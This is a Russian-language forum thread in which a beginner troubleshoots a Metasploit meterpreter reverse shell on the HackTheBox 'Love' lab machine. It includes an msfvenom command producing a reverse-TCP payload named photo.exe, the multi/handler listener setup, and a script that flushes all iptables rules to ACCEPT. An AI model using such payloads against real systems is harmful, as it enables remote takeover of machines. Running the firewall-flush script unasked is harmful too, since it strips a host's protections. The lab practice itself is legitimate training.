проблема с metasploit exploit/multi/handler

squadron

Newbie
31.07.2021
4
0
Доброго времени суток, форумчане. Я столкнулся с проблемой, при пинтесте машины Love на платформе HackTheBox. Суть в том, что мне нужно получить удаленный доступ, через полезную нагрузку и metasploit. Вот как я это делал:
Bash:
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=[myip] -f exe -o photo.exe
- это я создавал саму полезную нагрузку. После того, как я загрузил ее на атакуемую машину, я запустил слушатель:

Код:
msf6 > use multi/handler
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 1234
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on [my_ip]:1234
и после этого, я уже запустил на атакуемой машине саму полезную нагрузку, но, у меня также бесконечная загрузка. Запускал я разными способами, и я уверен, что проблема не в том, что я его не запустил(

Заранее спасибо!
 
1. Попробуй более популярный порт (80, 443 или типа того). Есть вероятность, что исходящее подключение блокирует фаер на таргете.
2. Проверь, что входящее подключение не блокирует фаер на твоём хосте с мсф.
3. Рекомендую в lhost указывать айпишник, а не интерфейс. Последний не всегда корректно отрабатывает.
 
1. Попробуй более популярный порт (80, 443 или типа того). Есть вероятность, что исходящее подключение блокирует фаер на таргете.
2. Проверь, что входящее подключение не блокирует фаер на твоём хосте с мсф.
3. Рекомендую в lhost указывать айпишник, а не интерфейс. Последний не всегда корректно отрабатывает.

а как проверить, не блокирует ли фаер на моём хосте? я новичок, поэтому пока что не очень разбираюсь
 
а как проверить, не блокирует ли фаер на моём хосте? я новичок, поэтому пока что не очень разбираюсь
Зависит от дистрибутива.
Если Кали, то это 'systemctl status nftables'.
 
● nftables.service - nftables
Loaded: loaded (/lib/systemd/system/nftables.service; disabled; vendor pre>
Active: inactive (dead)
Docs: man:nft(8)
http://wiki.nftables.org


вроде выключен

Эта запись свидетельствует о том, что файервол НА ТВОЕМ устройстве не активен и вряд-ли твои проблемы связаны с закрытыми портами.
Но если бы он и был активен, то его настройки легко сбрасываются простым bash-сценарием.
Код:
#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Код:
echo  "#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT" > StopIptables.sh

sudo chmod +x StopIptables.sh

sudo ./StopingIptables.sh
 
Эта запись свидетельствует о том, что файервол НА ТВОЕМ устройстве не активен и вряд-ли твои проблемы связаны с закрытыми портами.
Но если бы он и был активен, то его настройки легко сбрасываются простым bash-сценарием.
Код:
#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

Код:
echo  "#!/bin/sh
# Очистка всех цепочек iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT" > StopIptables.sh

sudo chmod +x StopIptables.sh

sudo ./StopingIptables.sh
спасибо, но так как мой фаервол не активен, то в чем тогда может быть проблема?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab